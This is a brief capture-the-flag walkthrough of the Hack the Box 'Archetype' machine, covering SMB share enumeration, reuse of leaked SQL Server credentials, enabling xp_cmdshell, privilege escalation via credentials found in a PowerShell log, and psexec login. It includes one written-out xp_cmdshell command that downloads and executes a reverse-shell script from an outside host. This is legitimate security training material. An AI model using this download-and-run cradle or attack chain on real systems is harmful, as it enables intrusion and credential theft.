Hack the Box — Archetype
Performing basic nmap scan shows that port 445 is open. Lets try to list the SMB’s share without password. For this I used smbclient. I tried connecting to every shares present. After that I tried connecting to the non-Administrative share “backups” and succeed. An interesting file contained username and password for an unknown service.
After googling about the file, I knew that the file is used by SQL Server. Since, we had “Microsoft SQL Server” running on port 1433. So, I used the credentials obtained to connect using impacket’s “mssqlclient.py”.
Typing help command gave information about “xp_cmdshell”.
xp_cmdshell is Microsoft’s built-in extended stored procedure. With this extended stored procedure we have the ability to run any command line process, so we can embed this within our stored procedures, jobs or batch processing. But, this option is disabled by default.
So, I enabled the xp_cmdshell and tried executing commands & got output.
After that, I hosted this powershell script to take a reverse shell in my machine and executed in the remote machine via this command.
xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.14.31:7878/shelly.ps1\");”
Time For Escalating Privelage
Then, I downloaded winpeas.exe from powershell in the remote machine and found powershell’s log file that contained administrator’s credentials.
After that, I used impacket’s “psexec.py” to log in to the administrator account.
